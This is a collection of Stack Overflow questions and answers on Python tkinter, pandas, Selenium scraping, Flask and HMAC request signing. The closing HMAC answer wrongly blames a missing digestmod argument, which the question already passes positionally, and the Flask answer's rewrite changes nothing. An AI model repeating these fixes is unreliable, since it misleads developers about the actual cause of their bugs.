I am writing a python tkinter-based GUI that should show Matplotlib-Plots in new Windows whenever I hit a button. Plots shall be non-exclusive, I want to be able to bring up as many Plots as I would like. (Original App has more than one button, I shortened it below) The Problem is: When I click one of my buttons the plot appears correctly. When I close the plot again the behaviour of the used button becomes spooky: at MacOS it appears pushed on Mouse-over at Windows it stays pushed for the rest of runtime On both OS'es it keeps working perfectly fine though. Only the graphics of the button are weird after first usage. I believe it has something to do with the running plt.show() blocking the GUI framework somehow, but I can not nail it down. class Simulator: def __init__(self) -> None: self.startGUI() def startGUI(self): self.window = tk.Tk() frmCol2 = tk.Frame(pady=10, padx=10) self.btnDraw = tk.Button(master = frmCol2, text="Draw Something", width=20) self.btnDraw.grid(row = 1, column = 1) self.btnDraw.bind("<Button-1>", self.drawSth) frmCol2.grid(row=1, column=2, sticky="N") self.window.mainloop() def drawSth(self, event): if self.btnDraw["state"] != "disabled": self.visualizer.plotSth(self.scenario) Plotting itself is then done by the object visualizer of the following class: class RadarVisualizer: def plotClutterVelocities(self, scenario): scArray = np.array(scenario) plt.figure() plt.plot(scArray[:,0], scArray[:,1]) plt.title("Some Title") plt.grid() plt.show() I checked the MPL Backend: It is TkAGG. I furthermore tried to put the plotting in a different thread which makes python crying a lot. It seems to expect the plots to be started in the same Thread. Maybe because the backend I am using is also Tkinter based.
[ "An example with many windows without plt.show(). Sample taken from here.\nimport tkinter as tk\nimport pandas as pd\nimport matplotlib.pyplot as plt\nfrom matplotlib.backends.backend_tkagg import FigureCanvasTkAgg\n\ni = 0\nnew_windows = []\n\ndata1 = {'country': ['A', 'B', 'C', 'D', 'E'],\n 'gdp_per_capita': [45000, 42000, 52000, 49000, 47000]\n }\ndf1 = pd.DataFrame(data1)\n\ndata2 = {'year': [1920, 1930, 1940, 1950, 1960, 1970, 1980, 1990, 2000, 2010],\n 'unemployment_rate': [9.8, 12, 8, 7.2, 6.9, 7, 6.5, 6.2, 5.5, 6.3]\n }\ndf2 = pd.DataFrame(data2)\n\ndata3 = {'interest_rate': [5, 5.5, 6, 5.5, 5.25, 6.5, 7, 8, 7.5, 8.5],\n 'index_price': [1500, 1520, 1525, 1523, 1515, 1540, 1545, 1560, 1555, 1565]\n }\ndf3 = pd.DataFrame(data3)\n\n\ndef f_1(win):\n global df1\n figure1 = plt.Figure(figsize=(6, 5), dpi=100)\n ax1 = figure1.add_subplot(111)\n bar1 = FigureCanvasTkAgg(figure1, win)\n bar1.get_tk_widget().pack(side=tk.LEFT, fill=tk.BOTH)\n df = df1[['country', 'gdp_per_capita']].groupby('country').sum()\n df.plot(kind='bar', legend=True, ax=ax1)\n ax1.set_title('Country Vs. GDP Per Capita')\n\n\ndef f_2(win):\n global df2\n figure2 = plt.Figure(figsize=(5, 4), dpi=100)\n ax2 = figure2.add_subplot(111)\n line2 = FigureCanvasTkAgg(figure2, win)\n line2.get_tk_widget().pack(side=tk.LEFT, fill=tk.BOTH)\n df = df2[['year', 'unemployment_rate']].groupby('year').sum()\n df.plot(kind='line', legend=True, ax=ax2, color='r', marker='o', fontsize=10)\n ax2.set_title('Year Vs. Unemployment Rate')\n\n\ndef f_3(win):\n global df3\n figure3 = plt.Figure(figsize=(5, 4), dpi=100)\n ax3 = figure3.add_subplot(111)\n ax3.scatter(df3['interest_rate'], df3['index_price'], color='g')\n scatter3 = FigureCanvasTkAgg(figure3, win)\n scatter3.get_tk_widget().pack(side=tk.LEFT, fill=tk.BOTH)\n ax3.legend(['index_price'])\n ax3.set_xlabel('Interest Rate')\n ax3.set_title('Interest Rate Vs. Index Price')\n\n\ndef new_window():\n global i\n new = tk.Toplevel(root)\n if i == 0:\n f_1(new)\n if i == 1:\n f_2(new)\n if i == 2:\n f_3(new)\n new_windows.append(new)\n i += 1\n if i > 2:\n i = 0\n\n\nroot = tk.Tk()\n\ntk.Button(root, text='new_window', command=new_window).pack()\n\nroot.mainloop()\n\n" ]
[ 1 ]
[]
[]
[ "matplotlib", "python", "tkinter" ]
stackoverflow_0074590539_matplotlib_python_tkinter.txt
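A smaller sketch, closer to the question's single-button setup: it builds a matplotlib.figure.Figure directly (no pyplot, so nothing blocks Tk) and wires the button through command= rather than a <Button-1> binding, which is a likely source of the stuck-pressed artwork; the sample scenario data is invented:

import tkinter as tk
import numpy as np
from matplotlib.figure import Figure
from matplotlib.backends.backend_tkagg import FigureCanvasTkAgg

def draw_something():
    win = tk.Toplevel(root)                  # each plot gets its own window
    fig = Figure(figsize=(5, 4), dpi=100)    # no pyplot state involved
    ax = fig.add_subplot(111)
    scenario = np.array([[0, 0], [1, 2], [2, 1], [3, 3]])
    ax.plot(scenario[:, 0], scenario[:, 1])
    ax.set_title("Some Title")
    ax.grid(True)
    canvas = FigureCanvasTkAgg(fig, master=win)
    canvas.draw()
    canvas.get_tk_widget().pack(fill=tk.BOTH, expand=True)

root = tk.Tk()
tk.Button(root, text="Draw Something", width=20,
          command=draw_something).pack(padx=10, pady=10)
root.mainloop()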
Q: Web-Scraping using "requests" does not scrape the names/leaves out important information I tried following this approach to webscraping names of this specific website containing names I am interested in.: import requests URL = "https://bair.berkeley.edu/students.html" page = requests.get(URL) print(page.text) When executing, I however only get: The first of the people listed on that website in my print output When I inspect it in Chrome, it reads <span class="name">Elaine Angelino</span>. The printed page.text however only reads <span class="name"></span>. How can I fix that issue and get all ~500 students and their names? Any help is appreciated! I tried to find ways to extract html another way, but was not successful so far. A: As the name list of the webpage is populated by JavaScript, So you can use selenium with bs4. from bs4 import BeautifulSoup import pandas as pd from selenium import webdriver from selenium.webdriver.chrome.service import Service import time webdriver_service = Service("./chromedriver") #Your chromedriver path driver = webdriver.Chrome(service=webdriver_service) driver.get('https://bair.berkeley.edu/students.html') driver.maximize_window() time.sleep(5) soup = BeautifulSoup(driver.page_source,"lxml") name_lst = [] for n in soup.select('.name'): name = n.get_text(strip=True) if n else None name_lst.append({'NAME':name}) df = pd.DataFrame(name_lst) print(df) Output: NAME 0 1 Yasin Abbasi-Yadkori 2 Pulkit Agrawal 3 Elaine Angelino 4 Khalid Ashraf .. ... 624 Rein Houthooft 625 Yanyan Lan 626 Erikson Nascimento 627 Tim G. J. Rudner 628 Markus Wulfmeier [629 rows x 1 columns]
Web-Scraping using "requests" does not scrape the names/leaves out important information
I tried following this approach to webscraping names of this specific website containing names I am interested in.: import requests URL = "https://bair.berkeley.edu/students.html" page = requests.get(URL) print(page.text) When executing, I however only get: The first of the people listed on that website in my print output When I inspect it in Chrome, it reads <span class="name">Elaine Angelino</span>. The printed page.text however only reads <span class="name"></span>. How can I fix that issue and get all ~500 students and their names? Any help is appreciated! I tried to find ways to extract html another way, but was not successful so far.
[ "As the name list of the webpage is populated by JavaScript, So you can use selenium with bs4.\nfrom bs4 import BeautifulSoup\nimport pandas as pd\nfrom selenium import webdriver\nfrom selenium.webdriver.chrome.service import Service\nimport time\n\nwebdriver_service = Service(\"./chromedriver\") #Your chromedriver path\ndriver = webdriver.Chrome(service=webdriver_service)\n\ndriver.get('https://bair.berkeley.edu/students.html')\ndriver.maximize_window()\ntime.sleep(5)\n\nsoup = BeautifulSoup(driver.page_source,\"lxml\")\nname_lst = []\n\nfor n in soup.select('.name'):\n name = n.get_text(strip=True) if n else None\n name_lst.append({'NAME':name})\n\ndf = pd.DataFrame(name_lst)\nprint(df)\n\nOutput:\n NAME\n0\n1 Yasin Abbasi-Yadkori\n2 Pulkit Agrawal\n3 Elaine Angelino\n4 Khalid Ashraf\n.. ...\n624 Rein Houthooft\n625 Yanyan Lan\n626 Erikson Nascimento\n627 Tim G. J. Rudner\n628 Markus Wulfmeier\n\n[629 rows x 1 columns]\n\n" ]
[ 1 ]
[]
[]
[ "beautifulsoup", "html", "python", "python_requests", "web_scraping" ]
stackoverflow_0074588610_beautifulsoup_html_python_python_requests_web_scraping.txt
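A small refinement of the Selenium answer above, replacing the fixed time.sleep(5) with an explicit wait for the JavaScript to populate the spans; this sketch assumes Selenium 4.6+, where the Chrome driver is resolved automatically:

from selenium import webdriver
from selenium.webdriver.common.by import By
from selenium.webdriver.support.ui import WebDriverWait

driver = webdriver.Chrome()
driver.get("https://bair.berkeley.edu/students.html")

# wait until at least one name span actually carries text
WebDriverWait(driver, 15).until(
    lambda d: any(el.text.strip()
                  for el in d.find_elements(By.CSS_SELECTOR, "span.name"))
)

names = [el.text.strip()
         for el in driver.find_elements(By.CSS_SELECTOR, "span.name")
         if el.text.strip()]
print(len(names), names[:3])
driver.quit()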
Q: Incorrectly Reading a Column Containing Lists in Pandas I have a pandas data frame containing a column with a list that I am reading from a CSV. For example, the column in the CSV appears like so: ColName2007 ============= ['org1', 'org2'] ['org2', 'org3'] ... So, when I read this column into Pandas, each entry of the columns is treated as a string, rather than a list of strings. df['ColName2007'][0] returns "['org1', 'org2']". Notice this is being stored as a string, not a list of strings. I want to be able to perform list operations on this data. What is a good way to quickly and efficiently convert this column of strings into a column of lists that contain strings? A: I would use a strip/split : df['ColName2007']= df['ColName2007'].str.strip("[]").str.split(",") Otherwise, you can apply an ast.literal_eval as suggested by @Bjay Regmi in the comments. import ast df["ColName2007"] = df["ColName2007"].apply(ast.literal_eval)
Incorrectly Reading a Column Containing Lists in Pandas
I have a pandas data frame containing a column with a list that I am reading from a CSV. For example, the column in the CSV appears like so: ColName2007 ============= ['org1', 'org2'] ['org2', 'org3'] ... So, when I read this column into Pandas, each entry of the columns is treated as a string, rather than a list of strings. df['ColName2007'][0] returns "['org1', 'org2']". Notice this is being stored as a string, not a list of strings. I want to be able to perform list operations on this data. What is a good way to quickly and efficiently convert this column of strings into a column of lists that contain strings?
[ "I would use a strip/split :\ndf['ColName2007']= df['ColName2007'].str.strip(\"[]\").str.split(\",\")\n\nOtherwise, you can apply an ast.literal_eval as suggested by @Bjay Regmi in the comments.\nimport ast\n\ndf[\"ColName2007\"] = df[\"ColName2007\"].apply(ast.literal_eval)\n\n" ]
[ 1 ]
[]
[]
[ "list", "pandas", "python", "python_3.x", "string" ]
stackoverflow_0074592771_list_pandas_python_python_3.x_string.txt
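A quick check of the difference between the two suggestions, using made-up data; note that the strip/split variant leaves the quotes and leading spaces on each item, while ast.literal_eval yields clean Python lists:

import ast
import pandas as pd

df = pd.DataFrame({"ColName2007": ["['org1', 'org2']", "['org2', 'org3']"]})

split_col = df["ColName2007"].str.strip("[]").str.split(",")
eval_col = df["ColName2007"].apply(ast.literal_eval)

print(split_col[0])  # ["'org1'", " 'org2'"] -- quotes and spaces survive
print(eval_col[0])   # ['org1', 'org2']      -- a real list of clean strings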
Q: How to sort multiple columns' values from min to max, and put in new columns in pandas dataframe? I have a dataframe with datetime objects in column 'start'. I want to sort these dates into new columns: every time the ID starts at a new location, in order df = pd.DataFrame(data={'ID':['a1','a2','a1','a1','a2','a2'], 'location':['bali','mosta','road','joha','alabama','vinice'], 'start':[pd.to_datetime('2022-11-18 16:28:35'), pd.to_datetime('2022-11-18 17:28:35'), pd.to_datetime('2022-11-19 16:28:35'), pd.to_datetime('2022-11-19 17:28:35'), pd.to_datetime('2022-11-19 17:18:35'), pd.to_datetime('2022-11-19 17:18:35') ]}) I want something like that: new_data = pd.DataFrame(data={'ID':['a1','a2',], 'location1':['bali','mosta'], 'start1':[pd.to_datetime('2022-11-18 16:28:35'),pd.to_datetime('2022-11-18 17:28:35') ], 'location2':['road','alabama'], 'start2': [pd.to_datetime('2022-11-19 16:28:35'),pd.to_datetime('2022-11-19 17:18:35')], 'location3':['joha','vinice'], 'start3': [pd.to_datetime('2022-11-19 17:28:35'),pd.to_datetime('2022-11-19 17:18:35')], }) A: Try: df["tmp"] = df.groupby("ID").cumcount() + 1 df = df.pivot(index="ID", columns="tmp") df.columns = [f"{t}_{n}" for t, n in df.columns] df = df[sorted(df, key=lambda k: ((int((i := k.split("_"))[1])), i[0]))] print(df.reset_index()) Prints: ID location_1 start_1 location_2 start_2 location_3 start_3 0 a1 bali 2022-11-18 16:28:35 road 2022-11-19 16:28:35 joha 2022-11-19 17:28:35 1 a2 mosta 2022-11-18 17:28:35 alabama 2022-11-19 17:18:35 vinice 2022-11-19 17:18:35
How to sort multiple columns' values from min to max, and put in new columns in pandas dataframe?
I have a dataframe with datetime objects in column 'start'. I want to sort these dates into new columns: every time the ID starts at a new location, in order df = pd.DataFrame(data={'ID':['a1','a2','a1','a1','a2','a2'], 'location':['bali','mosta','road','joha','alabama','vinice'], 'start':[pd.to_datetime('2022-11-18 16:28:35'), pd.to_datetime('2022-11-18 17:28:35'), pd.to_datetime('2022-11-19 16:28:35'), pd.to_datetime('2022-11-19 17:28:35'), pd.to_datetime('2022-11-19 17:18:35'), pd.to_datetime('2022-11-19 17:18:35') ]}) I want something like that: new_data = pd.DataFrame(data={'ID':['a1','a2',], 'location1':['bali','mosta'], 'start1':[pd.to_datetime('2022-11-18 16:28:35'),pd.to_datetime('2022-11-18 17:28:35') ], 'location2':['road','alabama'], 'start2': [pd.to_datetime('2022-11-19 16:28:35'),pd.to_datetime('2022-11-19 17:18:35')], 'location3':['joha','vinice'], 'start3': [pd.to_datetime('2022-11-19 17:28:35'),pd.to_datetime('2022-11-19 17:18:35')], })
[ "Try:\ndf[\"tmp\"] = df.groupby(\"ID\").cumcount() + 1\ndf = df.pivot(index=\"ID\", columns=\"tmp\")\ndf.columns = [f\"{t}_{n}\" for t, n in df.columns]\ndf = df[sorted(df, key=lambda k: ((int((i := k.split(\"_\"))[1])), i[0]))]\nprint(df.reset_index())\n\nPrints:\n ID location_1 start_1 location_2 start_2 location_3 start_3\n0 a1 bali 2022-11-18 16:28:35 road 2022-11-19 16:28:35 joha 2022-11-19 17:28:35\n1 a2 mosta 2022-11-18 17:28:35 alabama 2022-11-19 17:18:35 vinice 2022-11-19 17:18:35\n\n" ]
[ 0 ]
[]
[]
[ "group_by", "numpy", "python", "sorteddictionary", "sorting" ]
stackoverflow_0074592822_group_by_numpy_python_sorteddictionary_sorting.txt
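A variant of the answer above that first sorts by the timestamps, so the min-to-max ordering the question asks for holds regardless of the input row order, and that orders the wide columns with a MultiIndex swap instead of a custom sort key; this is only a sketch on the question's own data:

import pandas as pd

df = pd.DataFrame({
    "ID": ["a1", "a2", "a1", "a1", "a2", "a2"],
    "location": ["bali", "mosta", "road", "joha", "alabama", "vinice"],
    "start": pd.to_datetime([
        "2022-11-18 16:28:35", "2022-11-18 17:28:35", "2022-11-19 16:28:35",
        "2022-11-19 17:28:35", "2022-11-19 17:18:35", "2022-11-19 17:18:35",
    ]),
})

df = df.sort_values(["ID", "start"])              # guarantee min-to-max per ID
df["n"] = df.groupby("ID").cumcount() + 1
wide = df.pivot(index="ID", columns="n")
wide = wide.swaplevel(axis=1).sort_index(axis=1)  # pair location/start per step
wide.columns = [f"{name}{n}" for n, name in wide.columns]
print(wide.reset_index())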
Q: Using One-Hot Encoding vector as a feature for machine learning models I have a categorical column ('session', that can get one of these values: [2,4,8]), that I want to use while training a machine learning model (like RandomForest or MLP). In order to do that, I encoded this feature using the One-Hot Encode method: df= pd.get_dummies(df, columns=["session"], prefix="Sessions") and I got three new columns: Session_2, Session_4, Session_8 instead of the old session column. Then I converted these new 3 columns into one vector (as a list) and populated 'session' column with that list: df['session'] = np.array(df[['Sessions_2', 'Sessions_4', 'Sessions_8']], dtype=object).tolist() So, now the data looks like: When trying to train the ML model I thought that it's better to use the new vector 'session' column and not the separated Session_x columns (otherwise, why did we do the one-hot encoding at all!) But I'm getting this error: ValueError: setting an array element with a sequence. I searched for that error, and everywhere it was mentioned that the root cause might be when the shape is not the same or the elements have different data types... but this is not the case in my case! I verified that all vectors have the same size and all have the same types! (I also used dtype=object when creating the np array) I believe that the issue might be trying to load n-element array (sequence) into a single number slot which only has a float! I tried with 2 different ML models: RandomForest and MLP and still getting the same. How can I make my ML model work with the One-Hot encode vector? (is it the right approach in the first place to use a vector?) A: Your data frame already contains the one-hot encoding of the categorical feature, which literally is the combination of three existing columns, Session_2,4,8. No need of including that session column (object-type) as it is redundant and invalid.
Using One-Hot Encoding vector as a feature for machine learning models
I have a categorical column ('session', that can get one of these values: [2,4,8]), that I want to use while training a machine learning model (like RandomForest or MLP). In order to do that, I encoded this feature using the One-Hot Encode method: df= pd.get_dummies(df, columns=["session"], prefix="Sessions") and I got three new columns: Session_2, Session_4, Session_8 instead of the old session column. Then I converted these new 3 columns into one vector (as a list) and populated 'session' column with that list: df['session'] = np.array(df[['Sessions_2', 'Sessions_4', 'Sessions_8']], dtype=object).tolist() So, now the data looks like: When trying to train the ML model I thought that it's better to use the new vector 'session' column and not the separated Session_x columns (otherwise, why did we do the one-hot encoding at all!) But I'm getting this error: ValueError: setting an array element with a sequence. I searched for that error, and everywhere it was mentioned that the root cause might be when the shape is not the same or the elements have different data types... but this is not the case in my case! I verified that all vectors have the same size and all have the same types! (I also used dtype=object when creating the np array) I believe that the issue might be trying to load n-element array (sequence) into a single number slot which only has a float! I tried with 2 different ML models: RandomForest and MLP and still getting the same. How can I make my ML model work with the One-Hot encode vector? (is it the right approach in the first place to use a vector?)
[ "Your data frame already contains the one-hot encoding of the categorical feature, which literally is the combination of three existing columns, Session_2,4,8. No need of including that session column (object-type) as it is redundant and invalid.\n" ]
[ 2 ]
[]
[]
[ "machine_learning", "one_hot_encoding", "python" ]
stackoverflow_0074592788_machine_learning_one_hot_encoding_python.txt
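A toy illustration of the answer's point, feeding the dummy columns themselves to the model instead of re-packing them into one object column; the data and labels are invented:

import pandas as pd
from sklearn.ensemble import RandomForestClassifier

df = pd.DataFrame({"session": [2, 4, 8, 2, 4, 8], "y": [0, 1, 0, 1, 0, 1]})
X = pd.get_dummies(df[["session"]], columns=["session"], prefix="Sessions")
print(X.columns.tolist())   # ['Sessions_2', 'Sessions_4', 'Sessions_8']

model = RandomForestClassifier(n_estimators=10, random_state=0)
model.fit(X, df["y"])       # the dummy columns ARE the encoded feature
print(model.predict(X[:2]))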
Q: Python: If input == variable is correct but result is incorrect I'm now currently learning Python because of school projects and I'm trying to make an element guessing game based on the info given. Sorry if my English is bad cause I'm not native English speaker. Also first time using this platform lol. This is the code import random #Element and description astatine = "Rarest naturally occurring element in the Earth crust" bromine = "Naturally occurring element that is a liquid at room temperature besides Mercury" bismuth = "Most naturally diamagnetic element" radon = "Densest noble gases" tungsten = "Has the highest melting point of all metals" radium = "Heaviest alkaline earth metal" caesium = "Most reactive metal" neodymium = "Strongest permanent magnet" fermium = "Heaviest element that can be formed by neutron bombardment of lighter elements" oganesson = "Highest atomic number of all known elements" #Listing out the variables list = [astatine, bromine, bismuth, radon, tungsten, radium, caesium, neodymium, fermium, oganesson] #Opening input('Welcome to the element guessing game. Guess the element based on the info given. Press enter to continue.') #Randomise the list while True: randomdesc = random.choice(list) #Print the question print('↓↓↓\n' , '>>> ' , randomdesc , ' <<<') #Answer ans = str(input('Type your answer here → ')).lower #check if the answer is same as the element if ans == list: selection = input('Correct. Press 1 to play again. Press Any key to exit program') else: selection = input('Incorrect, Press 1 to play again. Press Any key to exit program.') if selection == "1": continue print('thanks') break The problem I currenly facing is I have no idea how to check whether the answer typed is correct or not. Whatever i type, it always show "Incorrect, Press 1 to play again. Press Any key to exit program." My ideal result is: Welcome to the element guessing game. Guess the element based on the info given. Press enter to continue. ↓↓↓ >>> Most reactive metal <<< Type your answer here → caesium Correct. Press 1 to play again. Press Any key to exit program thanks But instead the result is: Welcome to the element guessing game. Guess the element based on the info given. Press enter to continue. ↓↓↓ >>> Most reactive metal <<< Type your answer here → caesium Incorrect, Press 1 to play again. Press Any key to exit program. thanks What I want is when lets say the question is "Most reactive metal", and i should type caesium. But the problem is when it comes to check the answer, the code should be if ans == the element chosen: But i couldn't find a way to fit that inside. If i put "if ans == list:" it will always be incorrect no matter what i type. Or there's anyway to make the variable able to check the equality (not only strings) such as "if ans == caesium:" but the result is also same as previous one. Or is there a way to reverse the variables and strings such as caesium = "Most reactive metal" into "Most reactive metal" = caesium Conclusion, I stucked at the "if ans == something else:" part and i need to find a way to make it work so if the answer is correct, it will show "Correct. Press 1 to play again. Press Any key to exit program" and if the answer is wrong then it's the opposite. Thank you if you are willing to help <3 A: You have several misunderstandings here. You can't use the name of a variable as a string. What you need is a dictionary, where both key and value are strings. Next, you were using ...).lower, but without the parentheses, so the result was the lower function object, not the result of calling the function. This does what you want: import random elements = { "astatine": "Rarest naturally occurring element in the Earth crust", "bromine": "Naturally occurring element that is a liquid at room temperature besides Mercury", "bismuth": "Most naturally diamagnetic element", "radon": "Densest noble gases", "tungsten": "Has the highest melting point of all metals", "radium": "Heaviest alkaline earth metal", "caesium": "Most reactive metal", "neodymium": "Strongest permanent magnet", "fermium": "Heaviest element that can be formed by neutron bombardment of lighter elements", "oganesson": "Highest atomic number of all known elements" } input('Welcome to the element guessing game. Guess the element based on the info given. Press enter to continue.') #Randomise the list while True: elem = random.choice(list(elements)) print(elem) print('↓↓↓\n' , '>>> ' , elements[elem] , ' <<<') ans = input('Type your answer here → ').lower() #check if the answer is same as the element if ans == elem: selection = input('Correct. Press 1 to play again. Press Any key to exit program') else: selection = input('Incorrect, Press 1 to play again. Press Any key to exit program.') if selection == "1": continue print('thanks') break
Python: If input == variable is correct but result is incorrect
I'm now currently learning Python because of school projects and I'm trying to make an element guessing game based on the info given. Sorry if my English is bad cause I'm not native English speaker. Also first time using this platform lol. This is the code import random #Element and description astatine = "Rarest naturally occurring element in the Earth crust" bromine = "Naturally occurring element that is a liquid at room temperature besides Mercury" bismuth = "Most naturally diamagnetic element" radon = "Densest noble gases" tungsten = "Has the highest melting point of all metals" radium = "Heaviest alkaline earth metal" caesium = "Most reactive metal" neodymium = "Strongest permanent magnet" fermium = "Heaviest element that can be formed by neutron bombardment of lighter elements" oganesson = "Highest atomic number of all known elements" #Listing out the variables list = [astatine, bromine, bismuth, radon, tungsten, radium, caesium, neodymium, fermium, oganesson] #Opening input('Welcome to the element guessing game. Guess the element based on the info given. Press enter to continue.') #Randomise the list while True: randomdesc = random.choice(list) #Print the question print('↓↓↓\n' , '>>> ' , randomdesc , ' <<<') #Answer ans = str(input('Type your answer here → ')).lower #check if the answer is same as the element if ans == list: selection = input('Correct. Press 1 to play again. Press Any key to exit program') else: selection = input('Incorrect, Press 1 to play again. Press Any key to exit program.') if selection == "1": continue print('thanks') break The problem I currenly facing is I have no idea how to check whether the answer typed is correct or not. Whatever i type, it always show "Incorrect, Press 1 to play again. Press Any key to exit program." My ideal result is: Welcome to the element guessing game. Guess the element based on the info given. Press enter to continue. ↓↓↓ >>> Most reactive metal <<< Type your answer here → caesium Correct. Press 1 to play again. Press Any key to exit program thanks But instead the result is: Welcome to the element guessing game. Guess the element based on the info given. Press enter to continue. ↓↓↓ >>> Most reactive metal <<< Type your answer here → caesium Incorrect, Press 1 to play again. Press Any key to exit program. thanks What I want is when lets say the question is "Most reactive metal", and i should type caesium. But the problem is when it comes to check the answer, the code should be if ans == the element chosen: But i couldn't find a way to fit that inside. If i put "if ans == list:" it will always be incorrect no matter what i type. Or there's anyway to make the variable able to check the equality (not only strings) such as "if ans == caesium:" but the result is also same as previous one. Or is there a way to reverse the variables and strings such as caesium = "Most reactive metal" into "Most reactive metal" = caesium Conclusion, I stucked at the "if ans == something else:" part and i need to find a way to make it work so if the answer is correct, it will show "Correct. Press 1 to play again. Press Any key to exit program" and if the answer is wrong then it's the opposite. Thank you if you are willing to help <3
[ "You have several misunderstandings here. You can't use the name of a variable as a string. What you need is a dictionary, where both key and value are strings. Next, you were using ...).lower, but without the parentheses, so the result was the lower function object, not the result of calling the function.\nThis does what you want:\nimport random\n\nelements = {\n \"astatine\": \"Rarest naturally occurring element in the Earth crust\",\n \"bromine\": \"Naturally occurring element that is a liquid at room temperature besides Mercury\",\n \"bismuth\": \"Most naturally diamagnetic element\",\n \"radon\": \"Densest noble gases\",\n \"tungsten\": \"Has the highest melting point of all metals\",\n \"radium\": \"Heaviest alkaline earth metal\",\n \"caesium\": \"Most reactive metal\",\n \"neodymium\": \"Strongest permanent magnet\",\n \"fermium\": \"Heaviest element that can be formed by neutron bombardment of lighter elements\",\n \"oganesson\": \"Highest atomic number of all known elements\"\n}\n\n\ninput('Welcome to the element guessing game. Guess the element based on the info given. Press enter to continue.')\n#Randomise the list\nwhile True:\n elem = random.choice(list(elements))\n print(elem)\n print('↓↓↓\\n' , '>>> ' , elements[elem] , ' <<<')\n ans = input('Type your answer here → ').lower()\n\n #check if the answer is same as the element\n if ans == elem:\n selection = input('Correct. Press 1 to play again. Press Any key to exit program')\n else:\n selection = input('Incorrect, Press 1 to play again. Press Any key to exit program.')\n if selection == \"1\":\n continue\n print('thanks')\n break\n\n" ]
[ 0 ]
[]
[]
[ "if_statement", "python" ]
stackoverflow_0074592947_if_statement_python.txt
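The key step of the accepted fix, isolated: a dict maps each element name to its description, and random.choice over items() draws both at once. A compact sketch with a shortened, made-up element table:

import random

elements = {
    "caesium": "Most reactive metal",
    "radon": "Densest noble gas",
}

name, description = random.choice(list(elements.items()))
print('>>>', description, '<<<')
guess = input('Type your answer here → ').lower().strip()
print('Correct' if guess == name else 'Incorrect')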
Q: flask template rendering weird Looking at this, it should work right? It seems like the get request is overwriting the post request return because it only renders no error. Why is that? index.html {% if error %} <p>{{ error }}</p> {% else %} <p>no error</p> {% endif %} main.py @app.route('/', methods=['GET', 'POST']) def index(): if request.method == 'POST': post_data = request.get_json(force=True) if post_data['message'] == False: return render_template('index.html', error='not detected') return render_template('index.html') edit: still haven't found out what's wrong. A: Look closely at post_data['message']. Are you absolutely sure it's False? If it's the string 'False', the code falls through and won't render an error. A: Try using else or elif. else: @app.route('/', methods=['GET', 'POST']) def index(): if request.method == 'POST': post_data = request.get_json(force=True) if post_data['message'] == False: return render_template('index.html', error='not detected') else: return render_template('index.html') elif (recommended): @app.route('/', methods=['GET', 'POST']) def index(): if request.method == 'POST': post_data = request.get_json(force=True) if post_data['message'] == False: return render_template('index.html', error='not detected') elif request.method == 'GET': return render_template('index.html')
flask template rendering weird
Looking at this, it should work right? It seems like the get request is overwriting the post request return because it only renders no error. Why is that? index.html {% if error %} <p>{{ error }}</p> {% else %} <p>no error</p> {% endif %} main.py @app.route('/', methods=['GET', 'POST']) def index(): if request.method == 'POST': post_data = request.get_json(force=True) if post_data['message'] == False: return render_template('index.html', error='not detected') return render_template('index.html') edit: still haven't found out what's wrong.
[ "Look closely at post_data['message']. Are you absolutely sure it's False? If it's the string 'False', the code falls through and won't render an error.\n", "Try using else or elif.\nelse:\n@app.route('/', methods=['GET', 'POST'])\ndef index():\n if request.method == 'POST':\n post_data = request.get_json(force=True)\n if post_data['message'] == False:\n return render_template('index.html', error='not detected')\n else:\n return render_template('index.html')\n\nelif (recommended):\n@app.route('/', methods=['GET', 'POST'])\ndef index():\n if request.method == 'POST':\n post_data = request.get_json(force=True)\n if post_data['message'] == False:\n return render_template('index.html', error='not detected')\n elif request.method == 'GET':\n return render_template('index.html')\n\n" ]
[ 0, 0 ]
[]
[]
[ "flask", "post", "python" ]
stackoverflow_0074587480_flask_post_python.txt
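A sketch that folds both answers together: a single return path, plus a guard against a client sending the string "False" instead of the JSON boolean; it assumes a templates/index.html like the one in the question:

from flask import Flask, render_template, request

app = Flask(__name__)

@app.route('/', methods=['GET', 'POST'])
def index():
    error = None
    if request.method == 'POST':
        post_data = request.get_json(force=True)
        # catch the boolean False as well as string forms a client may send
        if post_data.get('message') in (False, 'False', 'false'):
            error = 'not detected'
    return render_template('index.html', error=error)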
Q: Need help to create signature in python I have sample code from golang; here are some sample values to run the code: app_secret = 777, path = /api/orders, app_key = 12345, timestamp = 1623812664, or you can refer to this link for more info: https://developers.tiktok-shops.com/documents/document/234136#3.Signature%20Algorithm import ( "crypto/hmac" "crypto/sha256" "encoding/hex" "sort" ) func generateSHA256(path string, queries map[string]string, secret string) string{ keys := make([]string, len(queries)) idx := 0 for k, _ := range queries{ keys[idx] = k idx++ } sort.Slice(keys, func(i, j int) bool { return keys[i] < keys[j] }) input := path for _, key := range keys{ input = input + key + queries[key] } input = secret + input + secret h := hmac.New(sha256.New, []byte(secret)) if _, err := h.Write([]byte(input)); err != nil{ // todo: log error return "" } return hex.EncodeToString(h.Sum(nil)) } I need help converting this golang sample into a python sample. I have tried, but I keep getting "signature invalid" when submitting my python code: import hmac import hashlib def _short_sign(self, app_key, app_secret, path, timestamp): base_string = "%sapp_key%stimestamp%s"%(path, app_key, timestamp) sign_string = app_secret + base_string + app_secret sign = hmac.new(app_secret.encode(), sign_string.encode(), hashlib.sha256).hexdigest() return sign A: Found the issue, i was trying to digest with out digestmod Working Example: sign = hmac.new( app_secret.encode(), sign_string.encode(), digestmod = hashlib.sha256 ).hexdigest()
Need help to create signature in python
I have sample code from golang; here are some sample values to run the code: app_secret = 777, path = /api/orders, app_key = 12345, timestamp = 1623812664, or you can refer to this link for more info: https://developers.tiktok-shops.com/documents/document/234136#3.Signature%20Algorithm import ( "crypto/hmac" "crypto/sha256" "encoding/hex" "sort" ) func generateSHA256(path string, queries map[string]string, secret string) string{ keys := make([]string, len(queries)) idx := 0 for k, _ := range queries{ keys[idx] = k idx++ } sort.Slice(keys, func(i, j int) bool { return keys[i] < keys[j] }) input := path for _, key := range keys{ input = input + key + queries[key] } input = secret + input + secret h := hmac.New(sha256.New, []byte(secret)) if _, err := h.Write([]byte(input)); err != nil{ // todo: log error return "" } return hex.EncodeToString(h.Sum(nil)) } I need help converting this golang sample into a python sample. I have tried, but I keep getting "signature invalid" when submitting my python code: import hmac import hashlib def _short_sign(self, app_key, app_secret, path, timestamp): base_string = "%sapp_key%stimestamp%s"%(path, app_key, timestamp) sign_string = app_secret + base_string + app_secret sign = hmac.new(app_secret.encode(), sign_string.encode(), hashlib.sha256).hexdigest() return sign
